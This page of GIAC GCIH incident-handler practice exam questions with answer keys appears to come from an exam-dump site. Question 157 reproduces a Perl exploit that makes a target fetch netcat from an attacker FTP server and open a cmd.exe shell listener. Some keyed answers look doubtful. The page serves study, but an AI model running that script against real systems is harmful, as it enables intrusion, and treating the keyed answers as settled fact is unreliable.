• Home
  • Blogs
  • [Jan-2024] GIAC GCIH Official Cert Guide PDF [Q144-Q159]

[Jan-2024] GIAC GCIH Official Cert Guide PDF [Q144-Q159]

Share

[Jan-2024] GIAC GCIH Official Cert Guide PDF

Exam GCIH: GIAC Certified Incident Handler - ExamPrepAway


In addition to passing the exam, candidates must also meet certain requirements to earn the GCIH certification. These include completing a course in incident handling and response, submitting a practical assignment, and agreeing to the GIAC code of ethics. These requirements ensure that certified professionals have the necessary skills and knowledge to handle cybersecurity incidents and protect their organizations from cyber threats.

 

NEW QUESTION # 144
John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

  • A. Gaining access
  • B. Covering tracks
  • C. Reconnaissance
  • D. Maintaining access

Answer: B


NEW QUESTION # 145
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point.
Which of the following type of scans would be most accurate and reliable?

  • A. ACK scan
  • B. UDP sacn
  • C. TCP Connect scan
  • D. Fin scan

Answer: C


NEW QUESTION # 146
Which of the following types of malware does not replicate itself but can spread only when the circumstances are beneficial?

  • A. Worm
  • B. Mass mailer
  • C. Trojan horse
  • D. Blended threat

Answer: C

Explanation:
Section: Volume B


NEW QUESTION # 147
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform a user must install a packet capture library.
What is the name of this library?

  • A. PCAP
  • B. SysPCap
  • C. WinPCap
  • D. libpcap

Answer: C


NEW QUESTION # 148
Which of the following is a reason to implement security logging on a DNS server?

  • A. For measuring a DNS server's performance
  • B. For recording the number of queries resolved
  • C. For monitoring unauthorized zone transfer
  • D. For preventing malware attacks on a DNS server

Answer: C

Explanation:
Section: Volume A


NEW QUESTION # 149
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the
target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of
the following tools can be used to perform session splicing attacks?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Fragroute
  • B. Y.A.T.
  • C. Nessus
  • D. Whisker

Answer: C,D


NEW QUESTION # 150
Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new
Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he
notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti-spyware software, and
keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds
that his computer is even more noticeably slow. He also notices a window or two pop-up on his screen, but they
quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Adam notices
that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam
thinks this is very odd.
Which of the following is the mostly likely the cause of the problem?

  • A. Computer is infected with the stealth kernel level rootkit.
  • B. Computer is infected with stealth virus.
  • C. Computer is infected with the Self-Replication Worm.
  • D. Computer is infected with the Stealth Trojan Virus.

Answer: A


NEW QUESTION # 151
Which of the following hacking tools provides shell access over ICMP?

  • A. Nmap
  • B. John the Ripper
  • C. Nessus
  • D. Loki

Answer: D


NEW QUESTION # 152
Which of the following tools can be used as penetration tools in the Information system auditing process?
Each correct answer represents a complete solution. Choose two.

  • A. Nmap
  • B. Snort
  • C. SARA
  • D. Nessus

Answer: C,D

Explanation:
Section: Volume B
Explanation/Reference:


NEW QUESTION # 153
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

  • A. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • D. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"

Answer: D


NEW QUESTION # 154
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses
software that keeps trying password combinations until the correct password is found. Which type of attack is this?

  • A. Man-in-the-middle
  • B. Brute Force
  • C. Denial-of-Service
  • D. Vulnerability

Answer: B


NEW QUESTION # 155
Which of the following incident response team members ensures that the policies of the organization are enforced
during the incident response?

  • A. Information Security representative
  • B. Legal representative
  • C. Human Resource
  • D. Technical representative

Answer: C


NEW QUESTION # 156
Which of the following types of rootkits replaces regular application binaries with Trojan fakes and modifies the
behavior of existing applications using hooks, patches, or injected code?

  • A. Hypervisor rootkit
  • B. Kernel level rootkit
  • C. Application level rootkit
  • D. Boot loader rootkit

Answer: C


NEW QUESTION # 157
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host - C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system ("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished
...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host
$port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Creates an FTP server with write permissions enabled
  • B. Opens up a SMTP server that requires no username or password
  • C. Opens up a telnet listener that requires no username or password
  • D. Creates a share called "sasfile" on the target system

Answer: C

Explanation:
Section: Volume A


NEW QUESTION # 158
In which of the following attacks does an attacker spoof the source address in IP packets that are sent to the victim?

  • A. DDoS
  • B. Backscatter
  • C. SQL injection
  • D. Dos

Answer: B

Explanation:
Section: Volume B


NEW QUESTION # 159
......


GIAC GCIH certification exam is an essential qualification for security professionals who want to demonstrate their expertise in incident handling and response. It is a challenging exam that requires extensive knowledge and experience in the field, but it can help individuals advance their careers and gain recognition in the industry. GIAC Certified Incident Handler certification is widely recognized and respected by leading organizations worldwide, and it can help individuals stand out in a competitive job market.


GIAC GCIH Certification Exam is an excellent way for security professionals and incident handlers to validate their skills and knowledge in the field of incident handling and response. By earning this certification, individuals can demonstrate their expertise to employers and clients, and enhance their career prospects in the field of cybersecurity.

 

Free GCIH Exam Dumps to Improve Exam Score: https://ucertify.examprepaway.com/GIAC/braindumps.GCIH.ete.file.html

Related Blogs

more
GIAC GCIH Certification Practice Exam